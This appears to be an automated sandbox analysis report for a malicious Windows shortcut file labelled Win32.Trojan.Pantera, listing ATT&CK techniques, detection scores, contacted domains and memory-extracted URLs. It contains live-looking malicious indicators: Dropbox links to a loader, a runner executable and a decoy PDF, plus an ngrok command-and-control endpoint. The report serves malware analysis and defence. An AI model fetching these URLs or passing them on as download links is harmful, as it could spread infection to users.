Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	11 Windows Management Instrumentation	1 Scripting	111 Process Injection	11 Masquerading	21 Input Capture	221 Security Software Discovery	Remote Services	21 Input Capture	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Command and Scripting Interpreter	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	11 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	3 PowerShell	Logon Script (Windows)	Logon Script (Windows)	41 Virtualization/Sandbox Evasion	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	111 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	115 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	3 Obfuscated Files or Information	Cached Domain Credentials	133 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
pkqLAMAv96.lnk	21%	ReversingLabs	Win32.Trojan.Pantera
pkqLAMAv96.lnk	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://ucc92cc8797dce098717f308293f.dl.dropboxusercontent.com/cd/0/get/CgaRoAXn44inIZLi9RO1hk9dvZYwrO3q5ZpYmLnyDB28oFZGSxVrsZU5ZdI03PozFS6meOPOe27VeEOKA8TR_Cth4xi4gw3NsY_8w6WADmBoMW9wvrHJE_uFpbukqFVZ_4L1itIKAEAxwHbXhgKW4e26/file?dl=1	0%	Avira URL Cloud	safe
http://www.ubi.com	0%	Avira URL Cloud	safe
https://ucba4b1078bde293defc150c5894.dl.dropboxusercontent.com0	0%	Avira URL Cloud	safe
https://ucba4b1078bde293defc150c5894.dl.dropboxusercontent.com/cd/0/get/CgZSpmkgglMHW_xaaU7yqi82x2q8KwWyqvhs2o8ESVwD1ny7JJxD0tMY9BrM0z0sqHg6HP3PasiERBoNA2jjZX3zJgMydw3s0GEWJ8eHDZ7bmxtwZuwAHu2TbWyzA-06cb8fnjg4dg4184uHnGSAFbpz/file?dl=1	0%	Avira URL Cloud	safe
https://permanently-removed.invalid/chrome/blank.htmljj	0%	Avira URL Cloud	safe
http://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app	0%	Avira URL Cloud	safe
http://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app0	0%	Avira URL Cloud	safe
https://uc60c26e4725b7ba7605f3b031bb.dl.dropboxusercontent.com	0%	Avira URL Cloud	safe
https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/api/secure/3fee076f9528f690839c19be95e034f2	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
fg.microsoft.map.fastly.net	199.232.214.172	true	false	high
chrome.cloudflare-dns.com	162.159.61.3	true	false	high
1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app	3.125.102.39	true	false	high
edge-block-www-env.dropbox-dns.com	162.125.69.15	true	false	high
www-env.dropbox-dns.com	162.125.65.18	true	false	high
ssl.bingadsedgeextension-prod-europe.azurewebsites.net	94.245.104.56	true	false	high
s-part-0035.t-0009.t-msedge.net	13.107.246.63	true	false	high
uc5c65c43ad4aba7cc9431e0b8f6.dl.dropboxusercontent.com	unknown	unknown	true	unknown
uc60c26e4725b7ba7605f3b031bb.dl.dropboxusercontent.com	unknown	unknown	true	unknown
bzib.nelreports.net	unknown	unknown	false	high
ucc92cc8797dce098717f308293f.dl.dropboxusercontent.com	unknown	unknown	true	unknown
ucba4b1078bde293defc150c5894.dl.dropboxusercontent.com	unknown	unknown	true	unknown
www.dropbox.com	unknown	unknown	false	high
ucafc6786f84446e8965e5916cb2.dl.dropboxusercontent.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://ucc92cc8797dce098717f308293f.dl.dropboxusercontent.com/cd/0/get/CgaRoAXn44inIZLi9RO1hk9dvZYwrO3q5ZpYmLnyDB28oFZGSxVrsZU5ZdI03PozFS6meOPOe27VeEOKA8TR_Cth4xi4gw3NsY_8w6WADmBoMW9wvrHJE_uFpbukqFVZ_4L1itIKAEAxwHbXhgKW4e26/file?dl=1	false	Avira URL Cloud: safe	unknown
https://www.dropbox.com/scl/fi/76ojn2f5am0wg3ws7kh33/secure.txt?rlkey=yejog0bk51d3d9mvha5r8cczb&dl=1	false		high
https://ucba4b1078bde293defc150c5894.dl.dropboxusercontent.com/cd/0/get/CgZSpmkgglMHW_xaaU7yqi82x2q8KwWyqvhs2o8ESVwD1ny7JJxD0tMY9BrM0z0sqHg6HP3PasiERBoNA2jjZX3zJgMydw3s0GEWJ8eHDZ7bmxtwZuwAHu2TbWyzA-06cb8fnjg4dg4184uHnGSAFbpz/file?dl=1	false	Avira URL Cloud: safe	unknown
https://www.dropbox.com/scl/fi/uan9gvebl6408bjvhbjdm/loader.txt?rlkey=k3wwqb6ysaho8yzi78guuwbl1&dl=1	false		high
https://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app/api/secure/3fee076f9528f690839c19be95e034f2	true	Avira URL Cloud: safe	unknown
https://www.dropbox.com/scl/fi/dgiur64vawmdx9alqw6et/Lewis-Silkin-LLP.pdf?rlkey=kduhqrnp00rj44rjeppuw31qk&dl=1	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://permanently-removed.invalid/oauth2/v2/tokeninfo	msedge.exe, 00000006.00000003.1637911564.0000584000274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1637735223.0000584000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1782322575.00006A5C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1783184680.00006A5C00274000.00000004.00000800.00020000.00000000.sdmp	false		high
https://paper.dropbox.com/cloud-docs/edit	powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/4633	msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7382	msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/284462263	msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ubi.comd:/dev/assassin-playground/dx10_integration/main/extern/onlineservices/Tracking/Module	f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001A.00000002.2352171309.0000000001683000.00000002.00000001.01000000.0000000E.sdmp, f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000002.2372568252.0000000001683000.00000002.00000001.01000000.0000000E.sdmp	false		high
https://www.dropbox.com/	powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7714	msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.dropbox.com/scl/fi/g33vds4uvy26a8v7ble7g/runner.exe?rlkey=cqe2asmea4sh0uo2xxsstxzd.	powershell.exe, 0000000F.00000002.2293605870.000001CA22E80000.00000004.00000020.00020000.00000000.sdmp	false		high
http://anglebug.com/6248	msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.ubi.com	f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000000.2350311729.00000000029D8000.00000002.00000001.01000000.0000000E.sdmp	false	Avira URL Cloud: safe	unknown
http://anglebug.com/6929	msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	false		high
https://officeapps-df.live.com	powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://api.login.yahoo.com/	powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5281	msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 0000000F.00000002.2248252077.000001CA0ABD1000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ucba4b1078bde293defc150c5894.dl.dropboxusercontent.com0	powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://login.yahoo.com/	powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.dropbox.com/playlist/	powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/255411748	msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	false		high
https://onedrive.live.com/picker	powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://permanently-removed.invalid/oauth2/v4/token	msedge.exe, 00000006.00000003.1637911564.0000584000274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1637735223.0000584000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1782322575.00006A5C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1783184680.00006A5C00274000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7246	msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.dropbox.com	powershell.exe, 0000000F.00000002.2248252077.000001CA0AE01000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7369	msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	false		high
https://anglebug.com/7489	msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chrome.google.com/webstore	msedge.exe, 00000006.00000002.1725171267.000058400017C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.1820362608.00006A5C0017C000.00000004.00000800.00020000.00000000.sdmp	false		high
http://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app	powershell.exe, 0000000F.00000002.2248252077.000001CA0C6F6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.ver)	svchost.exe, 00000007.00000002.2690269306.0000024B7CE00000.00000004.00000020.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/161903006	msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	false		high
https://docs.sandbox.google.com/document/fsip/	powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://permanently-removed.invalid/chrome/blank.html	msedge.exe, 00000006.00000003.1637911564.0000584000274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1637735223.0000584000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1782322575.00006A5C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1783184680.00006A5C00274000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3078	msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/7553	msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5375	msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	false		high
https://permanently-removed.invalid/v1/issuetoken	msedge.exe, 00000006.00000003.1637911564.0000584000274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1637735223.0000584000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1782322575.00006A5C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1783184680.00006A5C00274000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5371	msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/4722	msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	false		high
https://permanently-removed.invalid/reauth/v1beta/users/	msedge.exe, 00000006.00000003.1637911564.0000584000274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1637735223.0000584000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1782322575.00006A5C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1783184680.00006A5C00274000.00000004.00000800.00020000.00000000.sdmp	false		high
https://permanently-removed.invalid/LogoutYxAB	msedge.exe, 00000013.00000003.1782322575.00006A5C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1783184680.00006A5C00274000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/recaptcha/	powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/7556	msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	false		high
https://chromewebstore.google.com/	msedge.exe, 00000006.00000002.1725171267.000058400017C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.1820362608.00006A5C0017C000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dl-web.dropbox.com/	powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://permanently-removed.invalid/chrome/blank.htmljj	msedge.exe, 00000013.00000003.1782322575.00006A5C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1783184680.00006A5C00274000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://app.hellofax.com/	powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cfl.dropboxstatic.com/static/	powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.ubi.com/es	f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000000.2350311729.00000000029D8000.00000002.00000001.01000000.0000000E.sdmp	false		high
https://permanently-removed.invalid/RotateBoundCookies	msedge.exe, 00000006.00000003.1637911564.0000584000274000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1637735223.0000584000270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1782322575.00006A5C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000003.1783184680.00006A5C00274000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/6692	msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/258207403	msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3502	msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3623	msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.hellofax.com/	powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3625	msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3624	msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/5007	msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3862	msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	false		high
http://1zf9cygs0q3iviyowq83ddwzwtgf78rh.ngrok.app0	powershell.exe, 0000000F.00000002.2248252077.000001CA0C6F6000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://anglebug.com/4836	msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	false		high
https://issuetracker.google.com/issues/166475273	msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	false		high
https://instructorledlearning.dropboxbusiness.com/	powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.dropbox.com/pithos/	powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://sales.dropboxbusiness.com/	powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://msn.com/	msedge.exe, 00000006.00000002.1725555322.00005840003A0000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.1820719360.00006A5C00300000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/4384	msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	false		high
https://a.sprig.com/	powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.dropbox.com/encrypted_folder_download/service_worker.js	powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://anglebug.com/3970	msedge.exe, 00000006.00000003.1638884970.0000584000374000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.dropbox.com/static/api/	powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.ubi.com/de	f403e587-89ca-44df-ac2b-662ec52ae877.exe, 0000001C.00000000.2350311729.00000000029D8000.00000002.00000001.01000000.0000000E.sdmp	false		high
https://docsend.com/	powershell.exe, 0000000F.00000002.2248252077.000001CA0AFA0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFBB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0B02B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2248252077.000001CA0AFD5000.00000004.00000800.00020000.00000000.sdmp	false		high
